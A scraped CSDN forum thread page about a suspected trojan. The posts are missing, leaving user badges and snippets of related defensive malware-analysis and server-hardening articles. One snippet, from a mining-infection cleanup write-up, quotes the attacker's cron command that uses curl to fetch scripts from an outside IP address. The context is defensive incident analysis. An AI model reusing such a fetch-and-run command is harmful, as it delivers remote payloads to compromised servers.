CSDN论坛 > Windows专区 > 安全技术/病毒

木马? 病毒??????? [问题点数:100分,结帖人Theleme]

Bbs1
本版专家分:0
结帖率 100%
CSDN今日推荐
Bbs8
本版专家分:43548
Blank
微软MVP 2005年7月 荣获微软MVP称号
2008年7月 荣获微软MVP称号
2007年7月 荣获微软MVP称号
2006年7月 荣获微软MVP称号
Blank
红花 2005年5月 Windows专区大版内专家分月排行榜第一
2005年4月 Windows专区大版内专家分月排行榜第一
2005年3月 Windows专区大版内专家分月排行榜第一
Blank
黄花 2005年6月 Windows专区大版内专家分月排行榜第二
Bbs7
本版专家分:13778
Bbs2
本版专家分:307
Bbs7
本版专家分:21742
Blank
蓝花 2003年7月 Windows专区大版内专家分月排行榜第三
Bbs1
本版专家分:0
Bbs1
本版专家分:0
Bbs7
本版专家分:19278
Blank
蓝花 2004年11月 Windows专区大版内专家分月排行榜第三
Bbs7
本版专家分:19278
Blank
蓝花 2004年11月 Windows专区大版内专家分月排行榜第三
Bbs2
本版专家分:438
Blank
黄花 2004年7月 VC/MFC大版内专家分月排行榜第二
匿名用户不能发表回复!
其他相关推荐
一个感染型木马病毒分析(二)
作者:龙飞雪 0x1序言 前面已经对感染型木马病毒resvr.exe的病毒行为进行了具体的分析见一个感染型木马病毒分析(一),但是觉得还不够,不把这个感染型木马病毒的行为的亮点进行分析一下就有点遗憾了。下面就针对该感染型木马病毒的感染性、木马性以及被感染文件的恢复几个方面进行具体的分析和说明,直观感受一下病毒的感染性、木马性质。   0x2病毒木马性的分析---远程
服务器如何防止木马病毒-安全措施之一(WINDOWS 环境)
1:木马就是利用网站漏洞==方式上传到服务器中去的 (个人用户电脑一样),然后通过木马建立用户账号,进行远程控制       在网上看了一篇技术文章,然后记录下来     解决方案:  只需禁止服务器或个人电脑添加用户就OK了,如下:        打开 注册
一个DDOS木马后门病毒的分析
一、样本信息 文件名称:803c617e665ff7e0318386e24df63038 文件大小:61KB 病毒名称:DDoS/Nitol.A.1562 MD5:803c617e665ff7e0318386e24df63038 Sha-1:e05277aafd161470b020e9e8d2aa2dcb9759328c   二、样本行为 0x1.打开与当前病毒进程
一个简单的Android木马病毒的分析
一、样本信息 文件名称: 一个安卓病毒木马.apk  文件大小:242867 byte   文件类型:application/jar   病毒名称:Android.Trojan.SMSSend.KS 样本MD5:05B009F8E6C30A1BC0A0F793049960BC   二、病毒行为分析 0x1. 静态注册Android
阿里云挖矿批处理病毒的解决方案
背景打开了redis的外网端口,redis是由root用户启动,所以入侵者拿到了root权限,在批处理中加入了两个定时任务,每5秒钟去远程代理服务器(美国)获取脚本。分析查看cpu使用率较高的进程 top -c,发现是调用了tmp下的一个文件,tmp下公有多个可疑文件。crontab -l查看,发现有两个定时任务,/5 curl -fsSL http://165.225.157.157:8000/...
记一次Linux服务器上查杀木马经历
转载自:http://www.cnblogs.com/kerrycode/p/4754820.html 开篇前言      Linux服务器一直给我们的印象是安全、稳定、可靠,性能卓越。由于一来Linux本身的安全机制,Linux上的病毒、木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux的安全性有个误解:以为它永远不会感染病毒、木马;以为它没有安全漏洞。所以很
病毒木马查杀实战第018篇:病毒特征码查杀之基本原理
前言       在本系列的导论中,我曾经在“病毒查杀方法”中简单讲解过特征码查杀这种方式。而我也在对于实际病毒的专杀工具编写中,使用过CRC32算法来对目标程序进行指纹匹配,从而进行病毒判定。一般来说,类似于MD5以及CRC32这样的算法,在病毒大规模爆发时是可以提高查杀效率的,但是传统的更为常用的方法是采用以静态分析文件的结构为主并结合动态分析的方法,通过反汇编来寻找病毒的内容代码段、入口点代
暗云Ⅲ: 迄今为止最复杂的木马之一
肆虐多年的暗云木马近日出现多个变种,会感染硬盘主引导记录(MBR),开机启动时间比杀毒软件还要早,因此不但无法查杀,即使格式化硬盘也不能根治。 暗云木马是迄今为止最复杂的木马之一,曾经感染过数百万电脑,它用了很多复杂的新技术来长期潜伏在系统中,尤其是借助BootKit直接感染硬盘引导分区。 攻击者精心制作的这个恶意程序功能复杂,开发技巧很高,采用多种技术方案对抗安全软件,并且更新频繁。
HTA病毒分析
这两天看到了一种通过黄色网站,通过社会工程学下载严重加密的HTA文件,传播木马的web病毒 (有需要病毒代码的同学可以和我联系) 之前没看过HTA (HTML Application),看了才知道HTA是HTML格式的应用程序,双击后由mshta进程执行,因为在本地执行,所以在win7上不存在权限问题 例如 =================================
如何巧妙从进程中判断出病毒和木马
1.利用系统进程名字,以假乱真        系统中的正常进程有:svchost.exe、explorer.exe、iexplore.exe、winlogon.exe等,可能你发现过系统中存在这样的进程:svch0st.exe、explore.exe、iexplorer.exe、winlogin.exe。对比一下,发现区别了么?这是病毒经常使用的伎俩,目的就是迷惑用户的眼睛。通常它们会将系统中正常
关闭
关闭